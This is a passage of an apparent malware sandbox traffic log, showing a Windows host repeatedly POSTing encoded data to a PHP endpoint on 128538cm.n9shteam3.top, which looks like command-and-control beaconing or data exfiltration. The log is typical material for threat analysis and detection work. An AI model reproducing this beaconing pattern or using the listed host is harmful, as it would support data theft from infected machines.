                                                            Data Ascii: PR_T^BYS[_VZW[PXU^^IPRZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$3=(?\'"*$&](=#;$7$?"*+8W>B??!::%^./]+0
                                                            Sep 2, 2024 13:35:27.814825058 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:27.950074911 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:27 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            113192.168.2.64986180.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:28.072973967 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:28.431092024 CEST1028OUTData Raw: 50 55 5f 52 5b 43 5c 50 5b 5f 56 5a 57 55 50 5e 55 5d 5e 41 50 53 5a 5f 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PU_R[C\P[_VZWUP^U]^APSZ_YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&"1\=880!%_'.)<-/'?'*;0=7+=_/:%^./]+
                                                            Sep 2, 2024 13:35:28.739867926 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:28.872951031 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            114192.168.2.64986280.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:28.537966967 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:28.884207964 CEST1340OUTData Raw: 55 53 5a 54 5b 44 59 54 5b 5f 56 5a 57 5a 50 5d 55 5b 5e 45 50 5c 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: USZT[DYT[_VZWZP]U[^EP\Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'2.<(/'21['.2_+;,4<&?*(=$0*1)::%^./]+
                                                            Sep 2, 2024 13:35:29.204227924 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:29.337064028 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:28 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 23 0e 37 37 3f 55 26 5d 28 1d 29 29 04 12 3f 13 2f 19 2e 01 24 5c 33 39 09 5e 3c 32 29 52 31 3a 29 5b 3d 02 3e 05 28 0c 0f 52 21 34 20 5b 03 1f 25 17 34 32 26 51 25 28 25 59 25 34 31 00 21 09 02 5b 3d 03 2e 18 27 3d 20 1f 20 08 25 0e 2c 3d 3e 19 32 2b 20 12 2d 12 32 5e 25 14 2a 56 08 16 3b 0d 3c 02 29 00 34 37 2f 59 23 16 26 0b 34 36 05 51 27 23 37 52 27 14 29 55 30 00 2f 13 2a 03 27 16 27 00 2e 06 23 20 21 53 2c 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: #77?U&]())?/.$\39^<2)R1:)[=>(R!4 [%42&Q%(%Y%41![=.'= %,=>2+ -2^%*V;<)47/Y#&46Q'#7R')U0/*''.# !S,)$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            115192.168.2.64986380.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:29.000529051 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:29.352982998 CEST1028OUTData Raw: 50 51 5a 5f 5b 42 59 53 5b 5f 56 5a 57 5f 50 5d 55 51 5e 48 50 59 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PQZ_[BYS[_VZW_P]UQ^HPYZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0&+^+$%%>_([8[/8'<%</)$)59%^./]+
                                                            Sep 2, 2024 13:35:29.670289040 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:29.796789885 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            116192.168.2.64986480.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:29.917018890 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:30.274939060 CEST1028OUTData Raw: 50 53 5a 53 5e 49 59 51 5b 5f 56 5a 57 5f 50 5a 55 51 5e 47 50 5e 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZS^IYQ[_VZW_PZUQ^GP^ZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'!X=+8%2X$_(\;(\',<^?*8_?!!::%^./]+
                                                            Sep 2, 2024 13:35:30.593986988 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:30.722673893 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:29 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            117192.168.2.64986580.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:30.860719919 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:31.212620020 CEST1028OUTData Raw: 55 53 5a 5e 5b 42 5c 51 5b 5f 56 5a 57 59 50 52 55 5d 5e 44 50 59 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: USZ^[B\Q[_VZWYPRU]^DPYZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&".<($0%>]<.+/$\$<+,U>';>"\.*%^./]+8
                                                            Sep 2, 2024 13:35:31.526457071 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:31.653557062 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:30 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            118192.168.2.64986680.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:31.778268099 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:32.134522915 CEST1028OUTData Raw: 50 53 5a 53 5b 45 59 56 5b 5f 56 5a 57 5f 50 5f 55 51 5e 44 50 5e 5a 5c 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PSZS[EYV[_VZW_P_UQ^DP^Z\YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$0"<;#_0"1^$?=;/74'5V<^0*B')59%^./]+
                                                            Sep 2, 2024 13:35:32.426858902 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:32.554069996 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:31 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            119192.168.2.64986780.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:32.689176083 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1024
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:33.040501118 CEST1024OUTData Raw: 50 56 5a 50 5e 44 59 54 5b 5f 56 5a 57 5d 50 5b 55 58 5e 41 50 52 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PVZP^DYT[_VZW]P[UX^APRZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'['W&(;('2=':]<[?;<'/)W+ V>B;)1-:%^./]+,
                                                            Sep 2, 2024 13:35:33.342063904 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:33.469996929 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:32 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            120192.168.2.64986880.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:33.588916063 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:33.964642048 CEST1028OUTData Raw: 55 54 5a 50 5e 44 5c 54 5b 5f 56 5a 57 54 50 53 55 5e 5e 43 50 5e 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZP^D\T[_VZWTPSU^^CP^ZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&21X(0"6']<\,4[3<&(8(V= X=-::%^./]+
                                                            Sep 2, 2024 13:35:34.234487057 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:34.357059956 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ
                                                            Sep 2, 2024 13:35:34.434254885 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1340
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:34.635210991 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:34.638443947 CEST1340OUTData Raw: 55 54 5a 55 5b 46 59 52 5b 5f 56 5a 57 58 50 58 55 5a 5e 42 50 52 5a 51 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZU[FYR[_VZWXPXUZ^BPRZQYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$'%?;_01>$X*X?;,';'(8 T($$X=*^-:%^./]+<
                                                            Sep 2, 2024 13:35:35.258191109 CEST308INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 152
                                                            Connection: keep-alive
                                                            Data Raw: 03 1e 20 56 20 24 20 0c 26 02 34 10 3d 07 04 59 29 3e 28 06 2d 06 23 03 24 5f 3b 10 3f 0c 29 1b 25 07 36 02 2a 2c 3e 02 3e 22 39 54 23 24 20 5b 03 1f 25 18 20 0c 25 0f 25 38 03 11 25 37 0b 04 35 09 0e 17 28 2d 25 0e 27 3d 30 59 20 1f 21 0e 3b 13 08 53 32 01 24 12 2e 3f 22 5e 26 04 2a 56 08 16 38 55 3f 5a 3a 5e 20 09 09 59 37 06 3e 0f 23 25 33 53 24 20 28 0c 25 39 2e 0a 27 3e 23 56 3d 2d 0e 01 33 29 2d 5e 23 23 3a 0c 2c 29 24 50 2e 02 2d 56 03 30 57 53
                                                            Data Ascii: V $ &4=Y)>(-#$_;?)%6*,>>"9T#$ [% %%8%75(-%'=0Y !;S2$.?"^&*V8U?Z:^ Y7>#%3S$ (%9.'>#V=-3)-^##:,)$P.-V0WS


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            121192.168.2.64986980.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:34.532282114 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:34.884443998 CEST1028OUTData Raw: 55 54 5a 54 5e 46 59 50 5b 5f 56 5a 57 5e 50 53 55 51 5e 46 50 52 5a 59 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UTZT^FYP[_VZW^PSUQ^FPRZYYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$$!2(;+0=_'>:\( ]-4[&,6*(0*B')--:%^./]+$
                                                            Sep 2, 2024 13:35:35.183403969 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:35.394862890 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:34 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            122192.168.2.64987080.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:35.528321028 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:35.884314060 CEST1028OUTData Raw: 50 56 5f 56 5e 44 5c 50 5b 5f 56 5a 57 5c 50 5e 55 5f 5e 44 50 52 5a 5e 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PV_V^D\P[_VZW\P^U_^DPRZ^YXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'[$\<7\02*0.^+.<\;B8]&/%S?>$>"&^::%^./]+,
                                                            Sep 2, 2024 13:35:36.177639961 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:36.396120071 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            123192.168.2.64987180.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:36.528453112 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:36.884514093 CEST1028OUTData Raw: 50 55 5a 56 5e 47 5c 53 5b 5f 56 5a 57 55 50 5c 55 5e 5e 43 50 5b 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: PUZV^G\S[_VZWUP\U^^CP[ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\$&!9^?8#]$1!'=&\(7-'8Y'?6(;#>B<[=.*%^./]+
                                                            Sep 2, 2024 13:35:37.192662001 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:37.320971012 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:36 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            124192.168.2.64987280.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:37.451905012 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:37.806154966 CEST1028OUTData Raw: 55 5e 5a 53 5e 44 59 5d 5b 5f 56 5a 57 5b 50 59 55 58 5e 45 50 5f 5a 5a 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: U^ZS^DY][_VZW[PYUX^EP_ZZYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'0!<?]3*3\+=4]/?3<(;0Q)4 ^=.*%^./]+0
                                                            Sep 2, 2024 13:35:38.094038963 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:38.298681974 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:37 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
                                                            Data Ascii: 1VYZ


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            125192.168.2.64987380.211.144.15680
                                                            TimestampBytes transferredDirectionData
                                                            Sep 2, 2024 13:35:38.420145035 CEST322OUTPOST /VmPipepacketupdateflowerAsyncDatalifeTempuploads.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                            Host: 128538cm.n9shteam3.top
                                                            Content-Length: 1028
                                                            Expect: 100-continue
                                                            Sep 2, 2024 13:35:38.778358936 CEST1028OUTData Raw: 55 55 5f 52 5e 49 59 50 5b 5f 56 5a 57 5f 50 5e 55 5f 5e 45 50 53 5a 58 59 58 59 5f 56 53 5e 53 5d 5c 52 5b 52 59 57 50 42 53 5b 5f 5f 52 5f 5e 55 53 5f 57 5b 57 50 52 5d 5d 5e 5a 59 56 51 5e 5c 56 5a 59 54 5c 50 54 59 5c 47 59 5d 50 58 53 54 58
                                                            Data Ascii: UU_R^IYP[_VZW_P^U_^EPSZXYXY_VS^S]\R[RYWPBS[__R_^US_W[WPR]]^ZYVQ^\VZYT\PTY\GY]PXSTXXW[Y^_SPT]]XUV[YBWUY\Y[R][]UZS]GQV\VXWYY[TY^YWTXU\_[[X]SZPP\^VT[T[SZTZ__CQ^]T^\\\BZZ^S_F___TPV\RUU_P^\'3!<4$T*'=6\(;;'&?8/>$().%^./]+
                                                            Sep 2, 2024 13:35:39.063173056 CEST25INHTTP/1.1 100 Continue
                                                            Sep 2, 2024 13:35:39.189219952 CEST158INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 02 Sep 2024 11:35:38 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Content-Length: 4
                                                            Connection: keep-alive
                                                            Data Raw: 31 56 59 5a
